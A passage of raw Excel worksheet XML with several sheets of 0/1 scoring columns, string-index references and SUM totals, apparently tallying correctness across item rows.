        <f t="shared" si="1"/>
        <v>23</v>
      </c>
      <c r="H113" s="6">
        <f t="shared" si="1"/>
        <v>22</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A84:H84"/>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05D3-E100-42AE-989C-6BF182B1B16F}">
  <dimension ref="A1:H52"/>
  <sheetViews>
    <sheetView topLeftCell="A27" workbookViewId="0">
      <selection activeCell="F49" sqref="F49"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="26.6640625" customWidth="1"/>
    <col min="2" max="3" width="26.5546875" customWidth="1"/>
    <col min="4" max="4" width="10.109375" customWidth="1"/>
    <col min="5" max="5" width="9.6640625" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="10.44140625" customWidth="1"/>
    <col min="8" max="8" width="10.33203125" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="25.8" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>600</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>545</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>546</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>546</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>546</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>547</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>548</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>548</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>548</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>549</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>550</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>587</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>0</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>550</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>551</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>552</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>552</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>552</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>553</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>554</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>588</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>0</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>554</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>555</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>556</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>556</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>556</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>557</v>
      </c>
      <c r="B10" s="3"/>
      <c r="C10" s="3"/>
      <c r="F10" s="3"/>
    </row>
    <row r="11" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>558</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>559</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>559</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>559</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>560</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>561</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>561</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>561</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>562</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>563</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>563</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>563</v>
      </c>
      <c r="G13">
        <v>1</v>
      </c>
      <c r="H13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A14" s="3" t="s">
        <v>564</v>
      </c>
      <c r="B14" s="3" t="s">
        <v>565</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>565</v>
      </c>
      <c r="D14">
        <v>1</v>
      </c>
      <c r="E14">
        <v>1</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>594</v>
      </c>
      <c r="G14">
        <v>1</v>
      </c>
      <c r="H14">
        <v>1</v>
      </c>
    </row>
    <row r="15" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A15" s="3" t="s">
        <v>566</v>
      </c>
      <c r="B15" s="3" t="s">
        <v>567</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>567</v>
      </c>
      <c r="D15">
        <v>1</v>
      </c>
      <c r="E15">
        <v>1</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>567</v>
      </c>
      <c r="G15">
        <v>1</v>
      </c>
      <c r="H15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A16" s="3" t="s">
        <v>568</v>
      </c>
      <c r="B16" s="3" t="s">
        <v>569</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>569</v>
      </c>
      <c r="D16">
        <v>1</v>
      </c>
      <c r="E16">
        <v>1</v>
      </c>
      <c r="F16" s="3" t="s">
        <v>569</v>
      </c>
      <c r="G16">
        <v>1</v>
      </c>
      <c r="H16">
        <v>1</v>
      </c>
    </row>
    <row r="17" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A17" s="3" t="s">
        <v>570</v>
      </c>
      <c r="B17" s="3" t="s">
        <v>571</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>589</v>
      </c>
      <c r="D17">
        <v>1</v>
      </c>
      <c r="E17">
        <v>1</v>
      </c>
      <c r="F17" s="3" t="s">
        <v>595</v>
      </c>
      <c r="G17">
        <v>1</v>
      </c>
      <c r="H17">
        <v>0</v>
      </c>
    </row>
    <row r="18" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A18" s="3" t="s">
        <v>572</v>
      </c>
      <c r="B18" s="3" t="s">
        <v>573</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>590</v>
      </c>
      <c r="D18">
        <v>0</v>
      </c>
      <c r="E18">
        <v>0</v>
      </c>
      <c r="F18" s="3" t="s">
        <v>596</v>
      </c>
      <c r="G18">
        <v>1</v>
      </c>
      <c r="H18">
        <v>0</v>
      </c>
    </row>
    <row r="19" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>574</v>
      </c>
      <c r="B19" s="3" t="s">
        <v>575</v>
      </c>
      <c r="C19" s="3" t="s">
        <v>575</v>
      </c>
      <c r="D19">
        <v>1</v>
      </c>
      <c r="E19">
        <v>1</v>
      </c>
      <c r="F19" s="3" t="s">
        <v>575</v>
      </c>
      <c r="G19">
        <v>1</v>
      </c>
      <c r="H19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>576</v>
      </c>
      <c r="B20" s="3"/>
      <c r="C20" s="3"/>
      <c r="F20" s="3"/>
    </row>
    <row r="21" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>577</v>
      </c>
      <c r="B21" s="3"/>
      <c r="C21" s="3"/>
      <c r="F21" s="3"/>
    </row>
    <row r="22" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>578</v>
      </c>
      <c r="B22" s="3"/>
      <c r="C22" s="3"/>
      <c r="F22" s="3"/>
    </row>
    <row r="23" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>579</v>
      </c>
      <c r="B23" s="3"/>
      <c r="C23" s="3"/>
      <c r="F23" s="3"/>
    </row>
    <row r="24" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>580</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>581</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>591</v>
      </c>
      <c r="D24">
        <v>0</v>
      </c>
      <c r="E24">
        <v>0</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>597</v>
      </c>
      <c r="G24">
        <v>1</v>
      </c>
      <c r="H24">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>582</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>583</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>592</v>
      </c>
      <c r="D25">
        <v>1</v>
      </c>
      <c r="E25">
        <v>1</v>
      </c>
      <c r="F25" s="3" t="s">
        <v>583</v>
      </c>
      <c r="G25">
        <v>1</v>
      </c>
      <c r="H25">
        <v>1</v>
      </c>
    </row>
    <row r="26" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>584</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>585</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>593</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>598</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="40.799999999999997" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>586</v>
      </c>
      <c r="B27" s="3"/>
      <c r="C27" s="3"/>
      <c r="F27" s="3"/>
    </row>
    <row r="28" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A28" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D28" s="6">
        <f>SUM(D4:D26)</f>
        <v>16</v>
      </c>
      <c r="E28" s="6">
        <f t="shared" ref="E28:H28" si="0">SUM(E4:E26)</f>
        <v>14</v>
      </c>
      <c r="F28" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G28" s="6">
        <f t="shared" si="0"/>
        <v>18</v>
      </c>
      <c r="H28" s="6">
        <f t="shared" si="0"/>
        <v>15</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A31" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B31" s="25"/>
      <c r="C31" s="25"/>
      <c r="D31" s="25"/>
      <c r="E31" s="25"/>
      <c r="F31" s="25"/>
      <c r="G31" s="25"/>
      <c r="H31" s="25"/>
    </row>
    <row r="32" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A32" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B32" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C32" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D32" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E32" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F32" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G32" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H32" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="33" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G33" s="20">
        <v>1</v>
      </c>
      <c r="H33" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D34">
        <v>1</v>
      </c>
      <c r="E34">
        <v>1</v>
      </c>
      <c r="F34" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G34" s="20">
        <v>1</v>
      </c>
      <c r="H34" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="35" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>1591</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1335</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>1592</v>
      </c>
      <c r="D35">
        <v>0</v>
      </c>
      <c r="E35">
        <v>0</v>
      </c>
      <c r="F35" s="3" t="s">
        <v>1614</v>
      </c>
      <c r="G35" s="20">
        <v>0</v>
      </c>
      <c r="H35" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="36" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>1593</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1594</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1272</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>1615</v>
      </c>
      <c r="G36" s="20">
        <v>1</v>
      </c>
      <c r="H36" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>1595</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>1127</v>
      </c>
      <c r="D37">
        <v>1</v>
      </c>
      <c r="E37">
        <v>1</v>
      </c>
      <c r="F37" s="3" t="s">
        <v>1260</v>
      </c>
      <c r="G37" s="20">
        <v>1</v>
      </c>
      <c r="H37" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>1596</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D38">
        <v>1</v>
      </c>
      <c r="E38">
        <v>1</v>
      </c>
      <c r="F38" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G38" s="20">
        <v>1</v>
      </c>
      <c r="H38" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="39" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A39" s="3"/>
      <c r="B39" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1093</v>
      </c>
      <c r="D39" s="19">
        <v>1</v>
      </c>
      <c r="E39" s="19">
        <v>1</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>1093</v>
      </c>
      <c r="G39" s="20">
        <v>1</v>
      </c>
      <c r="H39" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>1099</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1123</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>1091</v>
      </c>
      <c r="D40">
        <v>1</v>
      </c>
      <c r="E40">
        <v>1</v>
      </c>
      <c r="F40" s="3" t="s">
        <v>1091</v>
      </c>
      <c r="G40" s="20">
        <v>1</v>
      </c>
      <c r="H40" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="41" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>1597</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1598</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>1599</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>1</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>1616</v>
      </c>
      <c r="G41" s="20">
        <v>1</v>
      </c>
      <c r="H41" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>1600</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1601</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>1592</v>
      </c>
      <c r="D42">
        <v>1</v>
      </c>
      <c r="E42">
        <v>1</v>
      </c>
      <c r="F42" s="3" t="s">
        <v>1617</v>
      </c>
      <c r="G42" s="20">
        <v>1</v>
      </c>
      <c r="H42" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="43" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>1602</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1384</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>1385</v>
      </c>
      <c r="D43">
        <v>1</v>
      </c>
      <c r="E43">
        <v>1</v>
      </c>
      <c r="F43" s="3" t="s">
        <v>1618</v>
      </c>
      <c r="G43" s="20">
        <v>1</v>
      </c>
      <c r="H43" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A44" s="3" t="s">
        <v>1603</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1604</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>1605</v>
      </c>
      <c r="D44">
        <v>1</v>
      </c>
      <c r="E44">
        <v>1</v>
      </c>
      <c r="F44" s="3" t="s">
        <v>1619</v>
      </c>
      <c r="G44" s="20">
        <v>1</v>
      </c>
      <c r="H44" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="45" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A45" s="3" t="s">
        <v>1603</v>
      </c>
      <c r="B45" s="3" t="s">
        <v>1604</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>1605</v>
      </c>
      <c r="D45">
        <v>1</v>
      </c>
      <c r="E45">
        <v>1</v>
      </c>
      <c r="F45" s="3" t="s">
        <v>1619</v>
      </c>
      <c r="G45" s="20">
        <v>1</v>
      </c>
      <c r="H45" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A46" s="3" t="s">
        <v>1606</v>
      </c>
      <c r="B46" s="3" t="s">
        <v>1607</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>1608</v>
      </c>
      <c r="D46">
        <v>1</v>
      </c>
      <c r="E46">
        <v>1</v>
      </c>
      <c r="F46" s="3" t="s">
        <v>1620</v>
      </c>
      <c r="G46" s="20">
        <v>1</v>
      </c>
      <c r="H46" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A47" s="3"/>
      <c r="B47" s="3" t="s">
        <v>1623</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>1624</v>
      </c>
      <c r="D47" s="19">
        <v>0</v>
      </c>
      <c r="E47" s="19">
        <v>0</v>
      </c>
      <c r="F47" s="3" t="s">
        <v>1623</v>
      </c>
      <c r="G47" s="20">
        <v>0</v>
      </c>
      <c r="H47" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="48" spans="1:8" ht="69" x14ac:dyDescent="0.25">
      <c r="A48" s="3" t="s">
        <v>1609</v>
      </c>
      <c r="B48" s="3" t="s">
        <v>1622</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>1625</v>
      </c>
      <c r="D48">
        <v>0</v>
      </c>
      <c r="E48">
        <v>0</v>
      </c>
      <c r="F48" s="3" t="s">
        <v>1626</v>
      </c>
      <c r="G48" s="20">
        <v>0</v>
      </c>
      <c r="H48" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="49" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A49" s="3"/>
      <c r="B49" s="3" t="s">
        <v>1627</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>1627</v>
      </c>
      <c r="D49" s="19">
        <v>1</v>
      </c>
      <c r="E49" s="19">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>1627</v>
      </c>
      <c r="G49" s="20">
        <v>1</v>
      </c>
      <c r="H49" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>1610</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="D50">
        <v>1</v>
      </c>
      <c r="E50">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="G50" s="20">
        <v>1</v>
      </c>
      <c r="H50" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" ht="110.4" x14ac:dyDescent="0.25">
      <c r="A51" s="3" t="s">
        <v>1611</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>1612</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1613</v>
      </c>
      <c r="D51">
        <v>1</v>
      </c>
      <c r="E51">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1621</v>
      </c>
      <c r="G51" s="20">
        <v>1</v>
      </c>
      <c r="H51" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A52" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D52" s="6">
        <f>SUM(D33:D51)</f>
        <v>16</v>
      </c>
      <c r="E52" s="6">
        <f t="shared" ref="E52:H52" si="1">SUM(E33:E51)</f>
        <v>16</v>
      </c>
      <c r="F52" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G52" s="6">
        <f t="shared" si="1"/>
        <v>16</v>
      </c>
      <c r="H52" s="6">
        <f t="shared" si="1"/>
        <v>16</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="3">
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A31:H31"/>
  </mergeCells>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D98E-DECE-421D-9C3E-040E10C6437F}">
  <dimension ref="A1:H106"/>
  <sheetViews>
    <sheetView topLeftCell="A100" workbookViewId="0">
      <selection activeCell="C69" sqref="C69"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.8" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="3" width="26.6640625" customWidth="1"/>
    <col min="4" max="4" width="9.6640625" customWidth="1"/>
    <col min="5" max="5" width="10.109375" customWidth="1"/>
    <col min="6" max="6" width="26.6640625" customWidth="1"/>
    <col min="7" max="7" width="10" customWidth="1"/>
    <col min="8" max="8" width="10.109375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" ht="30.6" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A1" s="29" t="s">
        <v>599</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x14ac:dyDescent="0.25">
      <c r="A4" s="3" t="s">
        <v>385</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="D4">
        <v>1</v>
      </c>
      <c r="E4">
        <v>1</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>103</v>
      </c>
      <c r="G4">
        <v>1</v>
      </c>
      <c r="H4">
        <v>1</v>
      </c>
    </row>
    <row r="5" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A5" s="3" t="s">
        <v>601</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>602</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>602</v>
      </c>
      <c r="D5">
        <v>1</v>
      </c>
      <c r="E5">
        <v>1</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>602</v>
      </c>
      <c r="G5">
        <v>1</v>
      </c>
      <c r="H5">
        <v>1</v>
      </c>
    </row>
    <row r="6" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A6" s="3" t="s">
        <v>386</v>
      </c>
      <c r="B6" s="3" t="s">
        <v>387</v>
      </c>
      <c r="C6" s="3" t="s">
        <v>387</v>
      </c>
      <c r="D6">
        <v>1</v>
      </c>
      <c r="E6">
        <v>1</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>387</v>
      </c>
      <c r="G6">
        <v>1</v>
      </c>
      <c r="H6">
        <v>1</v>
      </c>
    </row>
    <row r="7" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A7" s="3" t="s">
        <v>388</v>
      </c>
      <c r="B7" s="3" t="s">
        <v>187</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>187</v>
      </c>
      <c r="D7">
        <v>1</v>
      </c>
      <c r="E7">
        <v>1</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>187</v>
      </c>
      <c r="G7">
        <v>1</v>
      </c>
      <c r="H7">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A8" s="3" t="s">
        <v>603</v>
      </c>
      <c r="B8" s="3" t="s">
        <v>604</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>604</v>
      </c>
      <c r="D8">
        <v>1</v>
      </c>
      <c r="E8">
        <v>1</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>604</v>
      </c>
      <c r="G8">
        <v>1</v>
      </c>
      <c r="H8">
        <v>1</v>
      </c>
    </row>
    <row r="9" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A9" s="3" t="s">
        <v>605</v>
      </c>
      <c r="B9" s="3" t="s">
        <v>606</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>606</v>
      </c>
      <c r="D9">
        <v>1</v>
      </c>
      <c r="E9">
        <v>1</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>606</v>
      </c>
      <c r="G9">
        <v>1</v>
      </c>
      <c r="H9">
        <v>1</v>
      </c>
    </row>
    <row r="10" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A10" s="3" t="s">
        <v>607</v>
      </c>
      <c r="B10" s="3" t="s">
        <v>608</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>608</v>
      </c>
      <c r="D10">
        <v>1</v>
      </c>
      <c r="E10">
        <v>1</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>608</v>
      </c>
      <c r="G10">
        <v>1</v>
      </c>
      <c r="H10">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A11" s="3" t="s">
        <v>609</v>
      </c>
      <c r="B11" s="3" t="s">
        <v>610</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>610</v>
      </c>
      <c r="D11">
        <v>1</v>
      </c>
      <c r="E11">
        <v>1</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>610</v>
      </c>
      <c r="G11">
        <v>1</v>
      </c>
      <c r="H11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A12" s="3" t="s">
        <v>611</v>
      </c>
      <c r="B12" s="3" t="s">
        <v>612</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>612</v>
      </c>
      <c r="D12">
        <v>1</v>
      </c>
      <c r="E12">
        <v>1</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>612</v>
      </c>
      <c r="G12">
        <v>1</v>
      </c>
      <c r="H12">
        <v>1</v>
      </c>
    </row>
    <row r="13" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A13" s="3" t="s">
        <v>613</v>
      </c>
      <c r="B13" s="3" t="s">
        <v>614</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>614</v>
      </c>
      <c r="D13">
        <v>1</v>
      </c>
      <c r="E13">
        <v>1</v>
      </c>
